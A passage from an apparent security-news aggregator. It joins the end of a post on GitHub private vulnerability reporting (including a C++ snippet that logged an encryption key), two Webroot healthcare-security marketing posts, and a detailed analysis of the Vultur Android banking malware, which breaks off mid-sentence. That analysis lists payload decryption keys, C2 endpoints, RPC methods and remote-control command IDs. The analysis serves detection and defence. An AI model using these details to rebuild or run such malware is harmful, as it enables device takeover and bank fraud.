44c87c1 on August 22, 2023. The fixed version was released the next day as 0.4.4. Case 5: Insertion of MMKV database encryption key into Android system log with react-native-mmkv The last case concerns the disclosure of a plaintext encryption key in the react-native-mmkv library, which was fixed in September 2023. During a secure code review for a client, I discovered a commit that fixed an untracked vulnerability in a critical dependency. Because there was no security advisory or CVE ID, neither I nor the client were informed about the vulnerability. The lack of vulnerability management caused a situation where attackers knew about a vulnerability, but users were left in the dark. During the client engagement, I wanted to validate how the encryption key was used and handled. The commit fix: Don’t leak encryption key in logs in the react-native-mmkv library caught my attention. The following code shows the problematic log statement: MmkvHostObject::MmkvHostObject(const std::string& instanceId, std::string path, std::string cryptKey) { __android_log_print(ANDROID_LOG_INFO, "RNMMKV", "Creating MMKV instance \"%s\"... (Path: %s, Encryption-Key: %s)", instanceId.c_str(), path.c_str(), cryptKey.c_str()); std::string* pathPtr = path.size() > 0 ? &path : nullptr; {...omitted for brevity...} Figure 5: Code that initializes MMKV and also logs the encryption key Before that fix, the encryption key I was investigating was printed in plaintext to the Android system log. This breaks the threat model because this encryption key should not be extractable from the device, even with Android debugging features enabled. With the client’s agreement, I notified the author of react-native-mmkv, and the author and I concluded that the library users should be informed about the vulnerability. So the author enabled private reporting and together we published a GitHub advisory. The ID CVE-2024-21668 was assigned to the bug. The advisory now alerts developers if they use a vulnerable version of react-native-mmkv when running npm audit or npm install. This case highlights that there is basically no way around GitHub advisories when it comes to npm packages. The only way to feed the output of the npm audit command is to create a GitHub advisory. Using private reporting streamlines that process. Takeaways GitHub’s private reporting feature contributes to securing the software ecosystem. If used correctly, the feature saves time for vulnerability reporters and software maintainers. The biggest impact of private reporting is that it is linked to the GitHub advisory database—a link that is missing, for example, when using confidential issues in GitLab. With GitHub’s private reporting feature, there is now a process for security researchers to publish to that database (with the approval of the repository maintainers). The disclosure process also becomes clearer with a private report on GitHub. When using email, it is unclear whether you should encrypt the email and who you should send it to. If you’ve ever encrypted an email, you know that there are endless pitfalls. However, you may still want to send an email notification to developers or a security contact, as maintainers might miss GitHub notifications. A basic email with a link to the created advisory is usually enough to raise awareness. Step 1: Add a security policy Publishing a security policy is the first step towards owning a vulnerability reporting process. To avoid confusion, a good policy clearly defines what to do if you find a vulnerability. GitHub has two ways to publish a security policy. Either you can create a SECURITY.md file in the repository root, or you can create a user- or organization-wide policy by creating a .github repository and putting a SECURITY.md file in its root. We recommend starting with a policy generated using the Policymaker by disclose.io (see this example), but replace the Official Channels section with the following: We have multiple channels for receiving reports: * If you discover any security-related issues with a specific GitHub project, click the *Report a vulnerability* button on the *Security* tab in the relevant GitHub project: https://github.com/%5BYOUR_ORG%5D/%5BYOUR_PROJECT%5D.
* Send an email to security@example.com Always make sure to include at least two points of contact. If one fails, the reporter still has another option before falling back to messaging developers directly. Step 2: Enable private reporting Now that the security policy is set up, check out the referenced GitHub private reporting feature, a tool that allows discreet communication of vulnerabilities to maintainers so they can fix the issue before it’s publicly disclosed. It also notifies the broader community, such as npm, Crates.io, or Go users, about potential security issues in their dependencies. Enabling and using the feature is easy and requires almost no maintenance. The only key is to make sure that you set up GitHub notifications correctly. Reports get sent via email only if you configure email notifications. The reason it’s not enabled by default is that this feature requires active monitoring of your GitHub notifications, or else reports may not get the attention they require. After configuring the notifications, go to the “Security” tab of your repository and click “Enable vulnerability reporting”: Emails about reported vulnerabilities have the subject line “(org/repo) Summary (GHSA-0000-0000-0000).” If you use the website notifications, you will get one like this: If you want to enable private reporting for your whole organization, then check out this documentation. A benefit of using private reporting is that vulnerabilities are published in the GitHub advisory database (see the GitHub documentation for more information). If dependent repositories have Dependabot enabled, then dependencies to your project are updated automatically. On top of that, GitHub can also automatically issue a CVE ID that can be used to reference the bug outside of GitHub. This private reporting feature is still officially in beta on GitHub. We encountered minor issues like the lack of message templates and the inability of reporters to add collaborators. We reported the latter as a bug to GitHub, but they claimed that this was by design. Step 3: Get notifications via webhooks If you want notifications in a messaging platform of your choice, such as Slack, you can create a repository- or organization-wide webhook on GitHub. Just enable the following event type: After creating the webhook, repository_advisory events will be sent to the set webhook URL. The event includes the summary and description of the reported vulnerability. How to make security researchers happy If you want to increase your chances of getting high-quality vulnerability reports from security researchers and are already using GitHub, then set up a security policy and enable private reporting. Simplifying the process of reporting security bugs is important for the security of your software. It also helps avoid researchers becoming annoyed and deciding not to report a bug or, even worse, deciding to turn the vulnerability into an exploit or release it as a 0-day. If you use GitHub, this is your call to action to prioritize security, protect the public software ecosystem’s security, and foster a safer development environment for everyone by setting up a basic security policy and enabling private reporting. If you’re not a GitHub user, similar features also exist on other issue-tracking systems, such as confidential issues in GitLab. However, not all systems have this option; for instance, Gitea is missing such a feature. The reason we focused on GitHub in this post is because the platform is in a unique position due to its advisory database, which feeds into, for example, the npm package repository. But regardless of which platform you use, make sure that you have a visible security policy and reliable channels set up.
Categorías: Security Posts

3 healthcare organizations that are building cyber resilience

Webroot - Vie, 2024/04/05 - 20:15
From 2018 to 2023, healthcare data breaches have increased by 93 percent. And ransomware attacks have grown by 278 percent over the same period. Healthcare organizations can’t afford to let preventable breaches slip by. Globally, the average cost of a healthcare data breach has reached $10.93 million. The situation for healthcare organizations may seem bleak. But there is hope. Focus on layering your security posture to focus on threat prevention, protection, and recovery. Check out three healthcare organizations that are strengthening their cyber resilience with layered security tools. 1. Memorial Hermann balances user experience with encryption Email encryption keeps sensitive medical data safe and organizations compliant. Unfortunately, providers will skip it if the encryption tool is difficult to use. Memorial Hermann ran into this exact issue. Juggling compliance requirements with productivity needs, the organization worried about the user experience for email encryption. Webroot Email Encryption powered by Zix provides the solution. Nearly 75 percent of Memorial Hermann’s encrypted emails go to customers who share Webroot. Now more than 1,750 outside organizations can access encrypted email right from their inbox, with no extra steps or passwords. Read the full case study. 2. Allergy, Asthma and Sinus Center safeguards email The center needed to protect electronic medical records (EMR). But its old software solution required technical oversight that was difficult to manage. Webroot Email Threat Protection by OpenText gives the healthcare organization an easy way to keep EMR secure. OpenText’s in-house research team is continually monitoring new and emerging threats to ensure the center’s threat protection is always up to date. With high-quality protection and a low-maintenance design, the IT team can focus on other projects. When patient data is at stake, the center knows it can trust Webroot. Read the full case study. 3. Radiology Associates avoid downtime with fast recovery Radiologists need to read and interpret patient reports so they can quickly share them with doctors. Their patients’ health can’t afford for them to have downtime. After an unexpected server crash corrupted its database, Radiology Associates needed a way to avoid workflow interruptions. Carbonite Recover by OpenText helps the organization get back to business quickly in the event of a data breach or natural disaster. Plus, the price of the solution and ease of use gave Radiology Associates good reasons to choose our solution. Read the full case study. Conclusion As ransomware becomes more sophisticated and data breaches occur more frequently, healthcare organizations must stay vigilant. Strong cyber resilience should be a priority so that you can protect patient privacy and maintain trust within the healthcare industry. And you don’t have to do it alone. We’re ready to help out as your trusted cybersecurity partner. Together, we can prevent data breaches, protect sensitive data, and help you recover when disaster strikes. Contact us to learn more about our cybersecurity solutions. The post 3 healthcare organizations that are building cyber resilience appeared first on Webroot Blog.
Categorías: Security Posts

5 ways to strengthen healthcare cybersecurity

Webroot - Vie, 2024/04/05 - 19:44
Ransomware attacks are targeting healthcare organizations more frequently. The number of costly cyberattacks on US hospitals has doubled. So how do you prevent these attacks? Keep reading to learn five ways you can strengthen security at your organization. But first, let’s find out what’s at stake. Why healthcare needs better cybersecurity Healthcare organizations are especially vulnerable to data breaches because of how much data they hold. And when a breach happens, it creates financial burdens and affects regulatory compliance. On average, the cost of a healthcare data breach globally is $10.93 million. Noncompliance not only incurs more costs but also hurts patient trust. Once that trust is lost, it’s difficult to regain it, which can impact your business and standing within the industry. Adopting a layered security approach will help your organization prevent these attacks. Here are five ways to strengthen your cybersecurity: 1. Use preventive security technology Prevention, as the saying goes, prevention is better than the cure. With the right systems and the right methodology, it’s possible to detect and intercept most cyberthreats before they lead to a data breach, a loss of service, or a deterioration in patient care.
Examples of prevention-layer technologies include: 2. Provide cybersecurity training According to Verizon, 82 percent of all breaches involve a human element. Sometimes malicious insiders create security vulnerabilities. Other times, well-intentioned employees fall victim to attacks like phishing, legitimate-looking emails that trick employees into giving attackers their credentials or other sensitive information—like patient data. In fact, 16 percent of breaches start with phishing. When your employees receive basic cybersecurity training, they are more likely to recognize bad actors, report suspicious activity, and avoid risky behavior. You can outsource cybersecurity training or find an automated security training solution that you manage. 3. Ensure regulatory compliance Healthcare providers are subject to strict data privacy regulations like HIPPA and GDPR. If an avoidable data breach occurs, organizations face hefty fines from state and federal authorities. The email and endpoint protection tools described above help you stay compliant with these regulations. But sometimes a breach is out of your control. So regulators have provided guidelines for how to respond, including investigation, notification, and recovery. 4. Build business recovery plans Adding a recovery plan to your multilayered security approach is crucial to achieving and maintaining cyber resilient healthcare. Ideally, you’ll catch most incoming threats before they become an issue. However, the recovery layer is critical when threats do get through or disasters occur. You might think that your cloud-based applications back up and secure your data. But SaaS vendors explicitly state that data protection and backup is the customer’s responsibility of the customer. Some SaaS applications have recovery options, but they’re limited and ineffective. A separate backup system is necessary to ensure business continuity. Reasons for implementing a solid recovery strategy include:
  • Re-establishing patient trust.
  • Avoiding disruptions to patient care.
  • Remaining compliant with HIPPA and GDPR requirements.
Remember, lives depend on getting your systems back up quickly. That’s why your healthcare organization needs a secure, continuously updated backup and recovery solution for local and cloud servers. 5. Monitor and improve continuously Once you have your multilayered security approach in place, you’ll need a centralized management console to help you monitor and control all your security services. This single-pane-of-glass gives you real-time cyber intelligence and all the tools you need to protect your healthcare organization, your reputation, and your investment in digital transformation. You can also spot gaps in your approach and find ways to improve. Conclusion Cybersecurity can seem daunting at times. Just remember that every step you take toward cyber resilience helps you protect patient privacy and maintain your credibility within the healthcare industry.
So when you’re feeling overwhelmed or stuck, remember the five ways you can strengthen your layered cybersecurity approach:
  1. Use preventive technology like endpoint protection and email encryption.
  2. Train your employees to recognize malicious activities like phishing.
  3. Ensure that you’re compliant with HIPPA, GDPR, and any other regulation standards.
  4. Retrieve your data from breaches with backup and recovery tools.
  5. Monitor your data and improve your approach when necessary.
The post 5 ways to strengthen healthcare cybersecurity appeared first on Webroot Blog.
Categorías: Security Posts

Android Malware Vultur Expands Its Wingspan

Fox-IT - Jue, 2024/03/28 - 12:00
Authored by Joshua Kamp Executive summary The authors behind Android banking malware Vultur have been spotted adding new technical features, which allow the malware operator to further remotely interact with the victim’s mobile device. Vultur has also started masquerading more of its malicious activity by encrypting its C2 communication, using multiple encrypted payloads that are decrypted on the fly, and using the guise of legitimate applications to carry out its malicious actions. Key takeaways
  • The authors behind Vultur, an Android banker that was first discovered in March 2021, have been spotted adding new technical features.
  • New technical features include the ability to:
    • Download, upload, delete, install, and find files;
    • Control the infected device using Android Accessibility Services (sending commands to perform scrolls, swipe gestures, clicks, mute/unmute audio, and more);
    • Prevent apps from running;
    • Display a custom notification in the status bar;
    • Disable Keyguard in order to bypass lock screen security measures.
  • While the new features are mostly related to remotely interact with the victim’s device in a more flexible way, Vultur still contains the remote access functionality using AlphaVNC and ngrok that it had back in 2021.
  • Vultur has improved upon its anti-analysis and detection evasion techniques by:
    • Modifying legitimate apps (use of McAfee Security and Android Accessibility Suite package name);
    • Using native code in order to decrypt payloads;
    • Spreading malicious code over multiple payloads;
    • Using AES encryption and Base64 encoding for its C2 communication.
Introduction Vultur is one of the first Android banking malware families to include screen recording capabilities. It contains features such as keylogging and interacting with the victim’s device screen. Vultur mainly targets banking apps for keylogging and remote control. Vultur was first discovered by ThreatFabric in late March 2021. Back then, Vultur (ab)used the legitimate software products AlphaVNC and ngrok for remote access to the VNC server running on the victim’s device. Vultur was distributed through a dropper-framework called Brunhilda, responsible for hosting malicious applications on the Google Play Store [1]. The initial blog on Vultur uncovered that there is a notable connection between these two malware families, as they are both developed by the same threat actors [2]. In a recent campaign, the Brunhilda dropper is spread in a hybrid attack using both SMS and a phone call. The first SMS message guides the victim to a phone call. When the victim calls the number, the fraudster provides the victim with a second SMS that includes the link to the dropper: a modified version of the McAfee Security app. The dropper deploys an updated version of Vultur banking malware through 3 payloads, where the final 2 Vultur payloads effectively work together by invoking each other’s functionality. The payloads are installed when the infected device has successfully registered with the Brunhilda Command-and-Control (C2) server. In the latest version of Vultur, the threat actors have added a total of 7 new C2 methods and 41 new Firebase Cloud Messaging (FCM) commands. Most of the added commands are related to remote access functionality using Android’s Accessibility Services, allowing the malware operator to remotely interact with the victim’s screen in a way that is more flexible compared to the use of AlphaVNC and ngrok. In this blog we provide a comprehensive analysis of Vultur, beginning with an overview of its infection chain. We then delve into its new features, uncover its obfuscation techniques and evasion methods, and examine its execution flow. Following that, we dissect its C2 communication, discuss detection based on YARA, and draw conclusions. Let’s soar alongside Vultur’s smarter mobile malware strategies! Infection chain In order to deceive unsuspecting individuals into installing malware, the threat actors employ a hybrid attack using two SMS messages and a phone call. First, the victim receives an SMS message that instructs them to call a number if they did not authorise a transaction involving a large amount of money. In reality, this transaction never occurred, but it creates a false sense of urgency to trick the victim into acting quickly. A second SMS is sent during the phone call, where the victim is instructed into installing a trojanised version of the McAfee Security app from a link. This application is actually Brunhilda dropper, which looks benign to the victim as it contains functionality that the original McAfee Security app would have. As illustrated below, this dropper decrypts and executes a total of 3 Vultur-related payloads, giving the threat actors total control over the victim’s mobile device. Figure 1: Visualisation of the complete infection chain. Note: communication with the C2 server occurs during every malware stage. New features in Vultur The latest updates to Vultur bring some interesting changes worth discussing. The most intriguing addition is the malware’s ability to remotely interact with the infected device through the use of Android’s Accessibility Services. The malware operator can now send commands in order to perform clicks, scrolls, swipe gestures, and more. Firebase Cloud Messaging (FCM), a messaging service provided by Google, is used for sending messages from the C2 server to the infected device. The message sent by the malware operator through FCM can contain a command, which, upon receipt, triggers the execution of corresponding functionality within the malware. This eliminates the need for an ongoing connection with the device, as can be seen from the code snippet below. Figure 2: Decompiled code snippet showing Vultur’s ability to perform clicks and scrolls using Accessibility Services. Note for this (and upcoming) screenshot(s): some variables, classes and method names were renamed by the analyst. Pink strings indicate that they were decrypted. While Vultur can still maintain an ongoing remote connection with the device through the use of AlphaVNC and ngrok, the new Accessibility Services related FCM commands provide the actor with more flexibility. In addition to its more advanced remote control capabilities, Vultur introduced file manager functionality in the latest version. The file manager feature includes the ability to download, upload, delete, install, and find files. This effectively grants the actor(s) with even more control over the infected device. Figure 3: Decompiled code snippet showing part of the file manager related functionality. Another interesting new feature is the ability to block the victim from interacting with apps on the device. Regarding this functionality, the malware operator can specify a list of apps to press back on when detected as running on the device. The actor can include custom HTML code as a “template” for blocked apps. The list of apps to block and the corresponding HTML code to be displayed is retrieved through the vnc.blocked.packages C2 method. This is then stored in the app’s SharedPreferences. If available, the HTML code related to the blocked app will be displayed in a WebView after it presses back. If no HTML code is set for the app to block, it shows a default “Temporarily Unavailable” message after pressing back. For this feature, payload #3 interacts with code defined in payload #2. Figure 4: Decompiled code snippet showing part of Vultur’s implementation for blocking apps. The use of Android’s Accessibility Services to perform RAT related functionality (such as pressing back, performing clicks and swipe gestures) is something that is not new in Android malware. In fact, it is present in most Android bankers today. The latest features in Vultur show that its actors are catching up with this trend, and are even including functionality that is less common in Android RATs and bankers, such as controlling the device volume. A full list of Vultur’s updated and new C2 methods / FCM commands can be found in the “C2 Communication” section of this blog. Obfuscation techniques & detection evasion Like a crafty bird camouflaging its nest, Vultur now employs a set of new obfuscation and detection evasion techniques when compared to its previous versions. Let’s look into some of the notable updates that set apart the latest variant from older editions of Vultur. AES encrypted and Base64 encoded HTTPS traffic In October 2022, ThreatFabric mentioned that Brunhilda started using string obfuscation using AES with a varying key in the malware samples themselves [3]. At this point in time, both Brunhilda and Vultur did not encrypt its HTTP requests. That has changed now, however, with the malware developer’s adoption of AES encryption and Base64 encoding requests in the latest variants. Figure 5: Example AES encrypted and Base64 encoded request for bot registration. By encrypting its communications, malware can evade detection of security solutions that rely on inspecting network traffic for known patterns of malicious activity. The decrypted content of the request can be seen below. Note that the list of installed apps is shown as Base64 encoded text, as this list is encoded before encryption. {"id":"6500","method":"application.register","params":{"package":"com.wsandroid.suite","device":"Android/10","model":"samsung GT-I900","country":"sv-SE","apps":"cHQubm92b2JhbmNvLm5iYXBwO3B0LnNhbnRhbmRlcnRvdHRhLm1vYmlsZXBhcnRpY3VsYXJlcztzYS5hbHJhamhpYmFuay50YWh3ZWVsYXBwO3NhLmNvbS5zZS5hbGthaHJhYmE7c2EuY29tLnN0Y3BheTtzYW1zdW5nLnNldHRpbmdzLnBhc3M7c2Ftc3VuZy5zZXR0aW5ncy5waW47c29mdGF4LnBla2FvLnBvd2VycGF5O3RzYi5tb2JpbGViYW5raW5nO3VrLmNvLmhzYmMuaHNiY3VrbW9iaWxlYmFua2luZzt1ay5jby5tYm5hLmNhcmRzZXJ2aWNlcy5hbmRyb2lkO3VrLmNvLm1ldHJvYmFua29ubGluZS5tb2JpbGUuYW5kcm9pZC5wcm9kdWN0aW9uO3VrLmNvLnNhbnRhbmRlci5zYW50YW5kZXJVSzt1ay5jby50ZXNjb21vYmlsZS5hbmRyb2lkO3VrLmNvLnRzYi5uZXdtb2JpbGViYW5rO3VzLnpvb20udmlkZW9tZWV0aW5nczt3aXQuYW5kcm9pZC5iY3BCYW5raW5nQXBwLm1pbGxlbm5pdW07d2l0LmFuZHJvaWQuYmNwQmFua2luZ0FwcC5taWxsZW5uaXVtUEw7d3d3LmluZ2RpcmVjdC5uYXRpdmVmcmFtZTtzZS5zd2VkYmFuay5tb2JpbA==","tag":"dropper2"} Utilisation of legitimate package names The dropper is a modified version of the legitimate McAfee Security app. In order to masquerade malicious actions, it contains functionality that the official McAfee Security app would have. This has proven to be effective for the threat actors, as the dropper currently has a very low detection rate when analysed on VirusTotal. Figure 6: Brunhilda dropper’s detection rate on VirusTotal. Next to modding the legitimate McAfee Security app, Vultur uses the official Android Accessibility Suite package name for its Accessibility Service. This will be further discussed in the execution flow section of this blog. Figure 7: Snippet of Vultur’s AndroidManifest.xml file, where its Accessibility Service is defined with the Android Accessibility Suite package name. Leveraging native code for payload decryption Native code is typically written in languages like C or C++, which are lower-level than Java or Kotlin, the most popular languages used for Android application development. This means that the code is closer to the machine language of the processor, thus requiring a deeper understanding of lower-level programming concepts. Brunhilda and Vultur have started using native code for decryption of payloads, likely in order to make the samples harder to reverse engineer. Distributing malicious code across multiple payloads In this blog post we show how Brunhilda drops a total of 3 Vultur-related payloads: two APK files and one DEX file. We also showcase how payload #2 and #3 can effectively work together. This fragmentation can complicate the analysis process, as multiple components must be assembled to reveal the malware’s complete functionality. Execution flow: A three-headed… bird? While previous versions of Brunhilda delivered Vultur through a single payload, the latest variant now drops Vultur in three layers. The Brunhilda dropper in this campaign is a modified version of the legitimate McAfee Security app, which makes it seem harmless to the victim upon execution as it includes functionality that the official McAfee Security app would have. Figure 8: The modded version of the McAfee Security app is launched. In the background, the infected device registers with its C2 server through the /ejr/ endpoint and the application.register method. In the related HTTP POST request, the C2 is provided with the following information:
  • Malware package name (as the dropper is a modified version of the McAfee Security app, it sends the official com.wsandroid.suite package name);
  • Android version;
  • Device model;
  • Language and country code (example: sv-SE);
  • Base64 encoded list of installed applications;
  • Tag (dropper campaign name, example: dropper2).
The server response is decrypted and stored in a SharedPreference key named 9bd25f13-c3f8-4503-ab34-4bbd63004b6e, where the value indicates whether the registration was successful or not. After successfully registering the bot with the dropper C2, the first Vultur payload is eventually decrypted and installed from an onClick() method. Figure 9: Decryption and installation of the first Vultur payload. In this sample, the encrypted data is hidden in a file named 78a01b34-2439-41c2-8ab7-d97f3ec158c6 that is stored within the app’s “assets” directory. When decrypted, this will reveal an APK file to be installed. The decryption algorithm is implemented in native code, and reveals that it uses AES/ECB/PKCS5Padding to decrypt the first embedded file. The Lib.d() function grabs a substring from index 6 to 22 of the second argument (IPIjf4QWNMWkVQN21ucmNiUDZaVw==) to get the decryption key. The key used in this sample is: QWNMWkVQN21ucmNi (key varies across samples). With this information we can decrypt the 78a01b34-2439-41c2-8ab7-d97f3ec158c6 file, which brings us another APK file to examine: the first Vultur payload. Layer 1: Vultur unveils itself The first Vultur payload also contains the application.register method. The bot registers itself again with the C2 server as observed in the dropper sample. This time, it sends the package name of the current payload (se.accessibility.app in this example), which is not a modded application. The “tag” that was related to the dropper campaign is also removed in this second registration request. The server response contains an encrypted token for further communication with the C2 server and is stored in the SharedPreference key f9078181-3126-4ff5-906e-a38051505098. Figure 10: Decompiled code snippet that shows the data to be sent to the C2 server during bot registration. The main purpose of this first payload is to obtain Accessibility Service privileges and install the next Vultur APK file. Apps with Accessibility Service permissions can have full visibility over UI events, both from the system and from 3rd party apps. They can receive notifications, list UI elements, extract text, and more. While these services are meant to assist users, they can also be abused by malicious apps for activities, such as keylogging, automatically granting itself additional permissions, monitoring foreground apps and overlaying them with phishing windows. In order to gain further control over the infected device, this payload displays custom HTML code that contains instructions to enable Accessibility Services permissions. The HTML code to be displayed in a WebView is retrieved from the installer.config C2 method, where the HTML code is stored in the SharedPreference key bbd1e64e-eba3-463c-95f3-c3bbb35b5907. Figure 11: HTML code is loaded in a WebView, where the APP_NAME variable is replaced with the text “McAfee Master Protection”. In addition to the HTML content, an extra warning message is displayed to further convince the victim into enabling Accessibility Service permissions for the app. This message contains the text “Your system not safe, service McAfee Master Protection turned off. For using full device protection turn it on.” When the warning is displayed, it also sets the value of the SharedPreference key 1590d3a3-1d8e-4ee9-afde-fcc174964db4 to true. This value is later checked in the onAccessibilityEvent() method and the onServiceConnected() method of the malicious app’s Accessibility Service. ANALYST COMMENT
An important observation here, is that the malicious app is using the com.google.android.marvin.talkback package name for its Accessibility Service. This is the package name of the official Android Accessibility Suite, as can be seen from the following link: https://play.google.com/store/apps/details?id=com.google.android.marvin.talkback.
The implementation is of course different from the official Android Accessibility Suite and contains malicious code. When the Accessibility Service privileges have been enabled for the payload, it automatically grants itself additional permissions to install apps from unknown sources, and installs the next payload through the UpdateActivity. Figure 12: Decryption and installation of the second Vultur payload. The second encrypted APK is hidden in a file named data that is stored within the app’s “assets” directory. The decryption algorithm is again implemented in native code, and is the same as in the dropper. This time, it uses a different decryption key that is derived from the DXMgKBY29QYnRPR1k1STRBNTZNUw== string. The substring reveals the actual key used in this sample: Y29QYnRPR1k1STRB (key varies across samples). After decrypting, we are presented with the next layer of Vultur. Layer 2: Vultur descends The second Vultur APK contains more important functionality, such as AlphaVNC and ngrok setup, displaying of custom HTML code in WebViews, screen recording, and more. Just like the previous versions of Vultur, the latest edition still includes the ability to remotely access the infected device through AlphaVNC and ngrok. This second Vultur payload also uses the com.google.android.marvin.talkback (Android Accessibility Suite) package name for the malicious Accessibility Service. From here, there are multiple references to methods invoked from another file: the final Vultur payload. This time, the payload is not decrypted from native code. In this sample, an encrypted file named a.int is decrypted using AES/CFB/NoPadding with the decryption key SBhXcwoAiLTNIyLK (stored in SharedPreference key dffa98fe-8bf6-4ed7-8d80-bb1a83c91fbb). We have observed the same decryption key being used in multiple samples for decrypting payload #3. Figure 13: Decryption of the third Vultur payload. Furthermore, from payload #2 onwards, Vultur uses encrypted SharedPreferences for further hiding of malicious configuration related key-value pairs. Layer 3: Vultur strikes The final payload is a Dalvik Executable (DEX) file. This decrypted DEX file holds Vultur’s core functionality. It contains the references to all of the C2 methods (used in communication from bot to C2 server, in order to send or retrieve information) and FCM commands (used in communication from C2 server to bot, in order to perform actions on the infected device). An important observation here, is that code defined in payload #3 can be invoked from payload #2 and vice versa. This means that these final two files effectively work together. Figure 14: Decompiled code snippet showing some of the FCM commands implemented in Vultur payload #3. The last Vultur payload does not contain its own Accessibility Service, but it can interact with the Accessibility Service that is implemented in payload #2. C2 Communication: Vultur finds its voice When Vultur infects a device, it initiates a series of communications with its designated C2 server. Communications related to C2 methods such as application.register and vnc.blocked.packages occur using JSON-RPC 2.0 over HTTPS. These requests are sent from the infected device to the C2 server to either provide or receive information. Actual vultures lack a voice box; their vocalisations include rasping hisses and grunts [4]. While the communication in older variants of Vultur may have sounded somewhat similar to that, you could say that the threat actors have developed a voice box for the latest version of Vultur. The content of the aforementioned requests are now AES encrypted and Base64 encoded, just like the server response. Next to encrypted communication over HTTPS, the bot can receive commands via Firebase Cloud Messaging (FCM). FCM is a cross-platform messaging solution provided by Google. The FCM related commands are sent from the C2 server to the infected device to perform actions on it. During our investigation of the latest Vultur variant, we identified the C2 endpoints mentioned below. EndpointDescription/ejr/Endpoint for C2 communication using JSON-RPC 2.0.
Note: in older versions of Vultur the /rpc/ endpoint was used for similar communication./upload/Endpoint for uploading files (such as screen recording results)./version/app/?filename=ngrok&arch={DEVICE_ARCH}Endpoint for downloading the relevant version of ngrok./version/app/?filename={FILENAME}Endpoint for downloading a file specified by the payload (related to the new file manager functionality). C2 methods in Brunhilda dropper The commands below are sent from the infected device to the C2 server to either provide or receive information. MethodDescriptionapplication.registerRegisters the bot by providing the malware package name and information about the device: model, country, installed apps, Android version. It also sends a tag that is used for identifying the dropper campaign name.
Note: this method is also used once in Vultur payload #1, but without sending a tag. This method then returns a token to be used in further communication with the C2 server.application.stateSends a token value that was set as a response to the application.register command, together with a status code of “3”. C2 methods in Vultur The commands below are sent from the infected device to the C2 server to either provide or receive information. MethodDescriptionvnc.register (UPDATED)Registers the bot by providing the FCM token, malware package name and information about the device, model, country, Android version. This method has been updated in the latest version of Vultur to also include information on whether the infected device is rooted and if it is detected as an emulator.vnc.status (UPDATED)Sends the following status information about the device: if the Accessibility Service is enabled, if the Device Admin permissions are enabled, if the screen is locked, what the VNC address is. This method has been updated in the latest version of Vultur to also send information related to: active fingerprints on the device, screen resolution, time, battery percentage, network operator, location.vnc.appsSends the list of apps that are installed on the victim’s device.vnc.keylogSends the keystrokes that were obtained via keylogging.vnc.config (UPDATED)Obtains the config of the malware, such as the list of targeted applications by the keylogger and VNC. This method has been updated in the latest version of Vultur to also obtain values related to the following new keys: “packages2”, “rurl”, “recording”, “main_content”, “tvmq”.vnc.overlayObtains the HTML code for overlay injections of a specified package name using the pkg parameter. It is still unclear whether support for overlay injections is fully implemented in Vultur.vnc.overlay.logsSends the stolen credentials that were obtained via HTML overlay injections. It is still unclear whether support for overlay injections is fully implemented in Vultur.vnc.pattern (NEW)Informs the C2 server whether a PIN pattern was successfully extracted and stored in the application’s Shared Preferences.vnc.snapshot (NEW)Sends JSON data to the C2 server, which can contain:

1. Information about the accessibility event’s class, bounds, child nodes, UUID, event type, package name, text content, screen dimensions, time of the event, and if the screen is locked.
2. Recently copied text, and SharedPreferences values related to “overlay” and “keyboard”.
3. X and Y coordinates related to a click.vnc.submit (NEW)Informs the C2 server whether the bot registration was successfully submitted or if it failed.vnc.urls (NEW)Informs the C2 server about the URL bar related element IDs of either the Google Chrome or Firefox webbrowser (depending on which application triggered the accessibility event).vnc.blocked.packages (NEW)Retrieves a list of “blocked packages” from the C2 server and stores them together with custom HTML code in the application’s Shared Preferences. When one of these package names is detected as running on the victim device, the malware will automatically press the back button and display custom HTML content if available. If unavailable, a default “Temporarily Unavailable” message is displayed.vnc.fm (NEW)Sends file related information to the C2 server. File manager functionality includes downloading, uploading, installing, deleting, and finding of files.vnc.syslogSends logs.crash.logsSends logs of all content on the screen.installer.config (NEW)Retrieves the HTML code that is displayed in a WebView of the first Vultur payload. This HTML code contains instructions to enable Accessibility Services permissions. FCM commands in Vultur The commands below are sent from the C2 server to the infected device via Firebase Cloud Messaging in order to perform actions on the infected device. The new commands use IDs instead of names that describe their functionality. These command IDs are the same in different samples. CommandDescriptionregisteredReceived when the bot has been successfully registered.startStarts the VNC connection using ngrok.stopStops the VNC connection by killing the ngrok process and stopping the VNC service.unlockUnlocks the screen.deleteUninstalls the malware package.patternProvides a gesture/stroke pattern to interact with the device’s screen.109b0e16 (NEW)Presses the back button.18cb31d4 (NEW)Presses the home button.811c5170 (NEW)Shows the overview of recently opened apps.d6f665bf (NEW)Starts an app specified by the payload.1b05d6ee (NEW)Shows a black view.1b05d6da (NEW)Shows a black view that is obtained from the layout resources in Vultur payload #2.7f289af9 (NEW)Shows a WebView with HTML code loaded from SharedPreference key “946b7e8e”.dc55afc8 (NEW)Removes the active black view / WebView that was added from previous commands (after sleeping for 15 seconds).cbd534b9 (NEW)Removes the active black view / WebView that was added from previous commands (without sleeping).4bacb3d6 (NEW)Deletes an app specified by the payload.b9f92adb (NEW)Navigates to the settings of an app specified by the payload.77b58a53 (NEW)Ensures that the device stays on by acquiring a wake lock, disables keyguard, sleeps for 0,1 second, and then swipes up to unlock the device without requiring a PIN.ed346347 (NEW)Performs a click.5c900684 (NEW)Scrolls forward.d98179a8 (NEW)Scrolls backward.7994ceca (NEW)Sets the text of a specified element ID to the payload text.feba1943 (NEW)Swipes up.d403ad43 (NEW)Swipes down.4510a904 (NEW)Swipes left.753c4fa0 (NEW)Swipes right.b183a400 (NEW)Performs a stroke pattern on an element across a 3×3 grid.81d9d725 (NEW)Performs a stroke pattern based on x+y coordinates and time duration.b79c4b56 (NEW)Press-and-hold 3 times near bottom middle of the screen.1a7493e7 (NEW)Starts capturing (recording) the screen.6fa8a395 (NEW)Sets the “ShowMode” of the keyboard to 0. This allows the system to control when the soft keyboard is displayed.9b22cbb1 (NEW)Sets the “ShowMode” of the keyboard to 1. This means the soft keyboard will never be displayed (until it is turned back on).98c97da9 (NEW)Requests permissions for reading and writing external storage.7b230a3b (NEW)Request permissions to install apps from unknown sources.cc8397d4 (NEW)Opens the long-press power menu.3263f7d4 (NEW)Sets a SharedPreference value for the key “c0ee5ba1-83dd-49c8-8212-4cfd79e479c0” to the specified payload. This value is later checked for in other to determine whether the long-press power menu should be displayed (SharedPref value 1), or whether the back button must be pressed (SharedPref value 2).request_accessibility (UPDATED)Prompts the infected device with either a notification or a custom WebView that instructs the user to enable accessibility services for the malicious app. The related WebView component was not present in older versions of Vultur.announcement (NEW)Updates the value for the C2 domain in the 